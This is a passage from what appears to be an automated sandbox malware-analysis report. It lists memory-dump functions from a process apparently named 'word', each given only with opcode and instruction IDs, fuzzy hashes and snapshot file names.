                        • Instruction Fuzzy Hash: ADE04671509291AFD346CB24D851C66BFF9DFCA61070984CFA4849B263C5619C0ADBB2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F4CB88 Relevance: .0, Instructions: 20COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ae664eb3ff065ff16058d88383ed1554f2b5d04505f7b0cbc35ed58d86171cc9
                        • Instruction ID: 2549df37dc06b8548abc8a578d6f7f5323bdf7f672b2fd3dbeac12c3586fb9b5
                        • Opcode Fuzzy Hash: ae664eb3ff065ff16058d88383ed1554f2b5d04505f7b0cbc35ed58d86171cc9
                        • Instruction Fuzzy Hash: 11E04F7620D1925FC216CB6598208A6BFA4DA8A50070984CBA88087292C5519C06D7B2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F49CD9 Relevance: .0, Instructions: 20COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fb997a252137c394060ba478dd18dfdfb9fb6954d6ae95d7655b64169725e185
                        • Instruction ID: 321d2e5f77a888a1efb51f2f65e49618913f4d9332a7e7ac8c5922f6f8fe409a
                        • Opcode Fuzzy Hash: fb997a252137c394060ba478dd18dfdfb9fb6954d6ae95d7655b64169725e185
                        • Instruction Fuzzy Hash: C6E0867294D248AF8F01DBA4D98056B7FA89716200B1101F7DA05DB261EA710A009391
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F4BC51 Relevance: .0, Instructions: 20COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 098c83076de3b7f1bc2a381a485575f6675af791b08c8eaf42cee14f4f1925c2
                        • Instruction ID: 7117f013f6a490fd9fe250f935a5206761427b8de9fffe6aa27489f97d4f2c01
                        • Opcode Fuzzy Hash: 098c83076de3b7f1bc2a381a485575f6675af791b08c8eaf42cee14f4f1925c2
                        • Instruction Fuzzy Hash: 1BE0C27280D24CAFCB02DBA4C9D156EBFA8CB42300F2006E7D646CB232EE314E006392
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F48188 Relevance: .0, Instructions: 19COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4c0d2fcdd35a560c525ba18565802755d400544a8b5c804eb679a7e611550374
                        • Instruction ID: 83cd5a81127e3811b55eae2285ad0182c103d8add7f314bfbe499d3413f87a6d
                        • Opcode Fuzzy Hash: 4c0d2fcdd35a560c525ba18565802755d400544a8b5c804eb679a7e611550374
                        • Instruction Fuzzy Hash: D6E08C7160D2909FC302CF14DC2085ABFB5AFE7600B0984CFE881D72A2CA269C0AD773
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 04D46CA8 Relevance: .0, Instructions: 19COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.527891319.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_4d40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: db6ecf77a64e9297f4e8d273b83277138ab0860dc44bf32dad9e892546fd4d46
                        • Instruction ID: b2b1b7abc405163434b6194bcdb1234d4fd0d2be7c4a0e618107b14aadc772cc
                        • Opcode Fuzzy Hash: db6ecf77a64e9297f4e8d273b83277138ab0860dc44bf32dad9e892546fd4d46
                        • Instruction Fuzzy Hash: 9CE08CB6109200AFE302DB40E84085ABBB2EFD8610F04888EE48183212C6229D17CB32
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 04D4602F Relevance: .0, Instructions: 19COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.527891319.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_4d40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 15d0035eba0437b85798e6c317722470a85ea9f82de74ef301e0e283755d7d0c
                        • Instruction ID: 237dc32e4a904f15a2201dbe69c0794ab78a542540b43cb7a2d017f8d69e7718
                        • Opcode Fuzzy Hash: 15d0035eba0437b85798e6c317722470a85ea9f82de74ef301e0e283755d7d0c
                        • Instruction Fuzzy Hash: 45D05E342083808FD315DF00E8958A6FFB5FBC5614B56C89EE8A18B291DB75DC1BCB61
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F47380 Relevance: .0, Instructions: 18COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 461e59325a7c142caaa267818dfcc60aa4c2b14f4d2c00ccc306c527fa4bdc78
                        • Instruction ID: bfdff1fc0409ec4bead92c44b14e13777d2e2f70c72bad01a0a29bd43e5d622a
                        • Opcode Fuzzy Hash: 461e59325a7c142caaa267818dfcc60aa4c2b14f4d2c00ccc306c527fa4bdc78
                        • Instruction Fuzzy Hash: 32D0926181E3C1AFCF271B310C291103F705D5322532A44EBC891CB4F3C2689809E7A3
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 04D49458 Relevance: .0, Instructions: 18COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.527891319.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_4d40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a8e6a07dc12e02ad3e5ed504a5308a9fd4191ff32c073443818bcad8348e5d37
                        • Instruction ID: 74bd5e682b91a2d78f462f720d40d5774850364329bd47b2e62bddd07364fa43
                        • Opcode Fuzzy Hash: a8e6a07dc12e02ad3e5ed504a5308a9fd4191ff32c073443818bcad8348e5d37
                        • Instruction Fuzzy Hash: B2D012321001187F8B01CE84DC01CA67B6DEB89260704C056FD1487211C672DD22DBE0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 04D43991 Relevance: .0, Instructions: 18COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.527891319.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_4d40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fa7fac72eeb2d2c435fdc6516baf6048a4364db48879079f3cb0e3ef63e5ef64
                        • Instruction ID: f9d08bbe2a29222fa547e6136c7111a376f1810c066f49022987f4580aadf99d
                        • Opcode Fuzzy Hash: fa7fac72eeb2d2c435fdc6516baf6048a4364db48879079f3cb0e3ef63e5ef64
                        • Instruction Fuzzy Hash: 5BD05E7A24C3904FD305DA64D8918D2BBB1EBD922470588DBE49487393D66E9C0BC761
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F452FF Relevance: .0, Instructions: 17COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 78c38eaa05ec4de72307532d92485143c5358d40d3d88a80f50cc2e36bfe9579
                        • Instruction ID: 6284d2950a7540dac6a8ef8094b5bd930cd434629189e43426671dfe8dcbfa6e
                        • Opcode Fuzzy Hash: 78c38eaa05ec4de72307532d92485143c5358d40d3d88a80f50cc2e36bfe9579
                        • Instruction Fuzzy Hash: 49D05E302496815FC302C624C892662BFE1CFC6648B18C8AE948ACB2A7C939DC17C351
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F4922F Relevance: .0, Instructions: 17COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5bab93f7a0e6c0f3102b73d705af14100bf726baee6789f8dff80149ea5e5404
                        • Instruction ID: 3ee8d8b5a9e650046b883aabf968303e8ae902891560eea1f6721c5f168ba55c
                        • Opcode Fuzzy Hash: 5bab93f7a0e6c0f3102b73d705af14100bf726baee6789f8dff80149ea5e5404
                        • Instruction Fuzzy Hash: C7D0C92474D1502FCB5A9629AC504927FA25A8630072884EEAC48CBB96DAA1AF079A15
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 04D49CB8 Relevance: .0, Instructions: 17COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.527891319.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_4d40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8ab869af69afa5e3705abfa003fbeb05737d94153e11a484e1e7a4c73e3e153c
                        • Instruction ID: d8e6f52d84d0e9a7535ad6c92223e7db018a165c074aefbb2bfd7201b7f166f6
                        • Opcode Fuzzy Hash: 8ab869af69afa5e3705abfa003fbeb05737d94153e11a484e1e7a4c73e3e153c
                        • Instruction Fuzzy Hash: D3D05E322001187F8B00CE88DC00CA67BADEB89220B04C05AFD5887241CAB2ED22DBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 04D41258 Relevance: .0, Instructions: 17COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.527891319.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_4d40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 14f3c348d81d17b2471c5fded247b4a2d23f9e2cf14206c99fbe4a3762d35551
                        • Instruction ID: 612e054402bf38e081541674b3ed585e45be08b390121e9e3f4e50244af1a4ae
                        • Opcode Fuzzy Hash: 14f3c348d81d17b2471c5fded247b4a2d23f9e2cf14206c99fbe4a3762d35551
                        • Instruction Fuzzy Hash: 71D0137764551C7BC710FDA5B4C74D837E8E759105BD401D2E41887525FD112A3FE741
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 04D41B86 Relevance: .0, Instructions: 17COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.527891319.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_4d40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: dc2f5f38e56b68250d85805a143b0138568d084aaa0da61191808beeef7ab932
                        • Instruction ID: 0efc1ea860ce87658fb8d3ecea9ca91d7bcb25ee696c25c13f041d0763054555
                        • Opcode Fuzzy Hash: dc2f5f38e56b68250d85805a143b0138568d084aaa0da61191808beeef7ab932
                        • Instruction Fuzzy Hash: 03E0B630A08209DBE710CF50C55DBBE7BB0BB82348F1C441AC14AA6190F7B879C9DF81
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 04D41B6A Relevance: .0, Instructions: 17COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.527891319.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_4d40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 36f27d5c9a1b1119ce3a350fc39776ef72a7921b18736dc3962eadbf04bd9e24
                        • Instruction ID: 1dae48ec24c9697bb1aba4d3b8251fac72cd600d6a18756550f55abcb6d4e107
                        • Opcode Fuzzy Hash: 36f27d5c9a1b1119ce3a350fc39776ef72a7921b18736dc3962eadbf04bd9e24
                        • Instruction Fuzzy Hash: 3AE0B630A44209DBE710CF50C59DBBE7BF0AB82348F1C4419C14A66190F7B879C8DF81
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F432F0 Relevance: .0, Instructions: 16COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a1e215e23aeea70c411ab6ed08d390b672f163b36a8896d57c9fa5404f9c6051
                        • Instruction ID: 6aff87e6428c0437fa4b5339dce9bba68db5ffd626c6d4b0c90f2973ec53d1e4
                        • Opcode Fuzzy Hash: a1e215e23aeea70c411ab6ed08d390b672f163b36a8896d57c9fa5404f9c6051
                        • Instruction Fuzzy Hash: 5BD05ED241E3D49EE706467048661646F61EDA315931980CF8890CA1E7CB059B07E311
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F49F78 Relevance: .0, Instructions: 16COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ad9304e98d186695ef2bdacdc90700b50ba1e40d8572e8a04a980212c9dde8bc
                        • Instruction ID: 514a40eff14f32ca2983fb61e907eea6f4cf5f2bdeba1d0edb3b8d3b65f4c8a6
                        • Opcode Fuzzy Hash: ad9304e98d186695ef2bdacdc90700b50ba1e40d8572e8a04a980212c9dde8bc
                        • Instruction Fuzzy Hash: 23D05E2030E2511F9246C218C868413AFA19FE7224708C09AE889C72A2DA61BC07A610
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 04D41213 Relevance: .0, Instructions: 16COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.527891319.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_4d40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 286d14ed88de5b965baab0461ee46ebe9b388e2105627f100c976a23e922f4f3
                        • Instruction ID: ab4d659d4a8a3096d48f65a904fd792706a346908cd66b955fa086ecf27ea740
                        • Opcode Fuzzy Hash: 286d14ed88de5b965baab0461ee46ebe9b388e2105627f100c976a23e922f4f3
                        • Instruction Fuzzy Hash: 6BE02B3210DB899FCB21BB74E8154C53FB0ED02254B150AD3D554CB0B3DE120A27D785
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F492F0 Relevance: .0, Instructions: 15COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d9a4f6a918df41a8ca500046bd91247f42b38269936c5217b28128b01e350c5a
                        • Instruction ID: 06adf9d6526d0176af588b3c2811590366ababbb4e44fe3833c8fa17878a475c
                        • Opcode Fuzzy Hash: d9a4f6a918df41a8ca500046bd91247f42b38269936c5217b28128b01e350c5a
                        • Instruction Fuzzy Hash: 85D0C7703192405FC7468624D850465BFE15F9731031480EAD449CB2A6EE519D13E711
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F4E2B8 Relevance: .0, Instructions: 15COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a5ad95daddd8301b29a83fba2d74865aa56567e926ed27f8820c25d0462c98b3
                        • Instruction ID: f77e23ad38f81c14d8a69ee3d77f2eac5a157841a8266d0015f472484f16d34e
                        • Opcode Fuzzy Hash: a5ad95daddd8301b29a83fba2d74865aa56567e926ed27f8820c25d0462c98b3
                        • Instruction Fuzzy Hash: A9D0C772D0910CEB4711DFE5D50155F77EDDB45210B1149E6D50597210EE715B106BD1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F41525 Relevance: .0, Instructions: 15COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4c6b20a7da51ed11b7c0ac74fbae6c1118adcb783dabc2fd4032d60981a28448
                        • Instruction ID: 4d3a223d22d71ef42372997048e9e6f4bc0966ae0fbc9d7eab8b22b8f6b37815
                        • Opcode Fuzzy Hash: 4c6b20a7da51ed11b7c0ac74fbae6c1118adcb783dabc2fd4032d60981a28448
                        • Instruction Fuzzy Hash: 76D0C773D1910DEF4F01DFA4E5005EE77F5DB543017614AE6950AD7220DB314B506791
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F41528 Relevance: .0, Instructions: 15COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cacc273d5f7c946780bf065db27cbfc7e2a00fc5adf456473f134a57327b2950
                        • Instruction ID: a5c66dbc28704bd486fcc774b6b898ed19028412903727bd9b52d63a2c19a63d
                        • Opcode Fuzzy Hash: cacc273d5f7c946780bf065db27cbfc7e2a00fc5adf456473f134a57327b2950
                        • Instruction Fuzzy Hash: 23D0A973C0820CEF4B01EFA5EA0059EBBFCEB00200B6009E69A0A87210EF324B2067D1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F48BA8 Relevance: .0, Instructions: 15COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 11b41831e2ed796adf773d188e62655685e69bf0acfcfed88fd9bc9896d6c793
                        • Instruction ID: 9276846ce1813489b10effae60ea970c6718ad56f83b5b8c7982c991087365ea
                        • Opcode Fuzzy Hash: 11b41831e2ed796adf773d188e62655685e69bf0acfcfed88fd9bc9896d6c793
                        • Instruction Fuzzy Hash: E4D0C773D0920CEF4B11EFA5D60155FB7EDDB45240B1145E6D50597210EE715B1067D1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F49CE8 Relevance: .0, Instructions: 15COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f518b2b4c4760e0d1390c230d2a9e632d02206efaed43342aa2962599d7a6b26
                        • Instruction ID: 1baf894af0685c5bcbebfeb326783723c8143c92f39b22099d68546316b6568d
                        • Opcode Fuzzy Hash: f518b2b4c4760e0d1390c230d2a9e632d02206efaed43342aa2962599d7a6b26
                        • Instruction Fuzzy Hash: 01D0C772D0910CFB4B01DFA5D94155F77EDDB05240B2145F6DA0597210EE725B1067D1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F4BC60 Relevance: .0, Instructions: 15COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: af2bf520ca1413c4ed8cffca319bb0d08966cd957149926e91aa446abbc414dd
                        • Instruction ID: 1e0536c952f0ca40efdd1495b09ddb92fc226597d801162d547dcc08ab16f936
                        • Opcode Fuzzy Hash: af2bf520ca1413c4ed8cffca319bb0d08966cd957149926e91aa446abbc414dd
                        • Instruction Fuzzy Hash: F8D0A97280810CEB4B01EFA4C98189EBBECDB40200F2006E6DA0A87221EE324B106791
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 04D4ACE8 Relevance: .0, Instructions: 15COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.527891319.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_4d40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9df3a24e4b4715588ba62dde3ff97b8d42b9fb374f490cdcd0ab629139366a81
                        • Instruction ID: dbd1602913a91d91f185f9435821b78c79a79c59c8eea93ec49171d8c6fceec1
                        • Opcode Fuzzy Hash: 9df3a24e4b4715588ba62dde3ff97b8d42b9fb374f490cdcd0ab629139366a81
                        • Instruction Fuzzy Hash: 30D0A972D0820CFB4B00EFA4C90049EB7FCEB41200B2009EAEA06D7310EE32AB5067D1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 04D42D07 Relevance: .0, Instructions: 15COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.527891319.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_4d40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2a30d77ed1f96b7af8aafd42ab13ec231dffdf6bbad45c69171c22d6b85f5da3
                        • Instruction ID: 155e50e781663d3f558273e26ebfe847f9ab2ed6f7b723c29598e799a3408b26
                        • Opcode Fuzzy Hash: 2a30d77ed1f96b7af8aafd42ab13ec231dffdf6bbad45c69171c22d6b85f5da3
                        • Instruction Fuzzy Hash: 42D0A972D0900CEB4B00EFA0D5011AEBBB9DB01204B2005E6E60A9B210EF328B106BD1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 04D42D08 Relevance: .0, Instructions: 15COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.527891319.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_4d40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 498005f689d9ec831dce3a6dae13965d16f21d377460ba9a2f484f2ab6d7340c
                        • Instruction ID: d47d7f5a76146d115ee07020c981f081d3ef0e066457bb02e7f10f953acda958
                        • Opcode Fuzzy Hash: 498005f689d9ec831dce3a6dae13965d16f21d377460ba9a2f484f2ab6d7340c
                        • Instruction Fuzzy Hash: F9D0A972D0810CEB4B00EFA0C9015AEBBFDDB01204B2005E6E60697210EF32AB106BE1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 04D42109 Relevance: .0, Instructions: 15COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.527891319.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_4d40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3c5e8f954396ef584adcb4b3ff4293cd01c40bd42de0376ee783eaeea65d9262
                        • Instruction ID: 1286d7c21d744c966cc315fcf06bedf000bedecdbf470fd8682964fafd093cc3
                        • Opcode Fuzzy Hash: 3c5e8f954396ef584adcb4b3ff4293cd01c40bd42de0376ee783eaeea65d9262
                        • Instruction Fuzzy Hash: F7D05EB26083409FD355DB04C89097AB7A1EBE8300F14885EE59243351CA639C17CB51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 04D46A80 Relevance: .0, Instructions: 15COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.527891319.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_4d40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7649c4b73c1cbb73b992ac9a3f2632df15983552668c0a9e70291632b965f566
                        • Instruction ID: 3cd112ac78a9f0e8a883532ad3bab0a4b5bca49bb10de5048ee305622b02d73c
                        • Opcode Fuzzy Hash: 7649c4b73c1cbb73b992ac9a3f2632df15983552668c0a9e70291632b965f566
                        • Instruction Fuzzy Hash: 22D0A972D0850CFF4B00EFA4C9018AEB7FCDB02208B1085EAD60697210EE32AB2067E1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 04D41220 Relevance: .0, Instructions: 15COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.527891319.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_4d40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cc719e4e82ca4be04d17574c2b2bc3a7ee0cc829f2b1df1994ad7585df1ee821
                        • Instruction ID: 4fb192cd099d5e243385f391775086f4824e06d7aa83c9bbda8eb9ebb0d28b21
                        • Opcode Fuzzy Hash: cc719e4e82ca4be04d17574c2b2bc3a7ee0cc829f2b1df1994ad7585df1ee821
                        • Instruction Fuzzy Hash: 88D0A972A0810CEB4B00EFE4E98149EB7FEEB40200F1005E6DA06D7210EE32AB10AB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 04D453B3 Relevance: .0, Instructions: 15COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.527891319.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_4d40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 132e204ad1f50e8cea2bcaa99808d4b9b4732fcfa16f014561b5189aad594e2c
                        • Instruction ID: 7d39c31319db02f4b01534f7b8ce1cb6178e330f569a484bbfb3dc01341c5275
                        • Opcode Fuzzy Hash: 132e204ad1f50e8cea2bcaa99808d4b9b4732fcfa16f014561b5189aad594e2c
                        • Instruction Fuzzy Hash: 01D05E7410C3809FC345DB14CC5486ABB61FFD5320B158D8EE8B0872D6CB218847CB61
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 04D47707 Relevance: .0, Instructions: 15COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.527891319.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_4d40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
